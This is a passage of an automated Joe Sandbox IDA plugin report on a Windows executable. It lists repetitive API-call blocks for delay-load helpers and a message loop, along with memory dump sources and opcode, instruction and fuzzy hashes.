                                                                                                • Part of subcall function 0010AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                                • Part of subcall function 0010AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                                • Part of subcall function 0010AC74: IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                                • Part of subcall function 0010AC74: TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                                • Part of subcall function 0010AC74: DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: cf546f67d6c140044d627117282aff08fc99f6a9806a22696d20177fa8baf8ec
                                                                                              • Instruction ID: e29cb7b45bae0ebc153f163dca36cf2784cad1cc95f0f1b2eb7d4eb021da48d2
                                                                                              • Opcode Fuzzy Hash: cf546f67d6c140044d627117282aff08fc99f6a9806a22696d20177fa8baf8ec
                                                                                              • Instruction Fuzzy Hash: CDD09E72144300ABD6152B51CE06F1F7AA6BF98B05F404554B345748F2C672AD60AB16
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 698361f3830b916582a7b91289d06d2f9ea0d53155ae5a8d3526df6904fe5018
                                                                                              • Instruction ID: aee3711fd61643a2282db12ed573ac3b98c5ecb3d85d5980831998bad3d9d466
                                                                                              • Opcode Fuzzy Hash: 698361f3830b916582a7b91289d06d2f9ea0d53155ae5a8d3526df6904fe5018
                                                                                              • Instruction Fuzzy Hash: DFB092A626C602ACA1082180799283B0208C481B11325852AF589A40C09BC06C494831
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e6c1e2f76b95a0752e054bc6de5e3295a2f68bff97ce9113001cfd6b3a861d17
                                                                                              • Instruction ID: 722487e840f42871f2a1dc341fc49e3bb55ea6eaed21573810d07f88974d5985
                                                                                              • Opcode Fuzzy Hash: e6c1e2f76b95a0752e054bc6de5e3295a2f68bff97ce9113001cfd6b3a861d17
                                                                                              • Instruction Fuzzy Hash: 65B092A226D402ACA108618479829360208C482B11328C01AF989E41C0D7C0680A0931
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7e469321f137d198d3762826fb15fbd2eca81f9725350d7c722dad9dd8dd7e98
                                                                                              • Instruction ID: e12ce1f3992b1d0061be412e4e379b8e3a5d1b87b17de5554783271c40ce3e54
                                                                                              • Opcode Fuzzy Hash: 7e469321f137d198d3762826fb15fbd2eca81f9725350d7c722dad9dd8dd7e98
                                                                                              • Instruction Fuzzy Hash: ECB012B626C506ECB10C61D47DC2D3B030CD4C1B11334C01BF589E40C0D7C07C090A31
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b80cfb61f88420f16896248b1a12d3f1c9a2d2b2d3b4d93f7471c13cd3192d04
                                                                                              • Instruction ID: 76e7d07fb244936c4917591413072492dddcedbb51ae05d1d9fc6772217658f0
                                                                                              • Opcode Fuzzy Hash: b80cfb61f88420f16896248b1a12d3f1c9a2d2b2d3b4d93f7471c13cd3192d04
                                                                                              • Instruction Fuzzy Hash: 65B012B326C502ECB10C61C47D82D37030CC4C2B11334C01BF98DE40C0D7C06C090931
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5ac988909644be028f81771c0413d10f6a313c10417258aa55cbb350ec52648f
                                                                                              • Instruction ID: 9a45686dae1dd7016b97aff7818851d39644011520c2e102adc00ae82792075e
                                                                                              • Opcode Fuzzy Hash: 5ac988909644be028f81771c0413d10f6a313c10417258aa55cbb350ec52648f
                                                                                              • Instruction Fuzzy Hash: BEB092A226C502ACA148618479829360208C481B11329C11AF589E41C0DBC0688A0931
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ed7e81d46436d9786a2667715349f4059ec14484e3035c54461cd015dda38491
                                                                                              • Instruction ID: 281ea63ab53c553701a7a5be100307a8a40b81cb00b428eb581bf719c800b85c
                                                                                              • Opcode Fuzzy Hash: ed7e81d46436d9786a2667715349f4059ec14484e3035c54461cd015dda38491
                                                                                              • Instruction Fuzzy Hash: 2BB092A226C402ACA10C61847A829360208C481B11328C01AF589E41C0D7D0680E0931
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1bce245ea1464c0c19df01118efa510a3248f4781218a8abd08a5036052ea1d1
                                                                                              • Instruction ID: 1cc85c768c613eff251b89386e0ff676a07c1d0d5efd5e80ce8a556ebecc6e64
                                                                                              • Opcode Fuzzy Hash: 1bce245ea1464c0c19df01118efa510a3248f4781218a8abd08a5036052ea1d1
                                                                                              • Instruction Fuzzy Hash: F1B012B226C402ECB10C61C47E82D37030CC4C1B11334C01BF58DE40C0E7C06D0A0931
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 53bc3507dcb50063bc751259a4070dd76b89d8968e0b8d8718c5f51318d1134a
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 53bc3507dcb50063bc751259a4070dd76b89d8968e0b8d8718c5f51318d1134a
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 49c4e2eb5c1ee94dcdb76be3b221e495f530c8fe5a7bdb28cd0a818cbf94d24f
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 49c4e2eb5c1ee94dcdb76be3b221e495f530c8fe5a7bdb28cd0a818cbf94d24f
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ec24574f7536239a4c999062505f83fa4e10b13148702a7df1346f2a8bd00020
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: ec24574f7536239a4c999062505f83fa4e10b13148702a7df1346f2a8bd00020
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 12dbb4ad2b92447c06b8637fc6b6e6f3634cad99d7b1af8cb828159f30d297a2
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 12dbb4ad2b92447c06b8637fc6b6e6f3634cad99d7b1af8cb828159f30d297a2
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
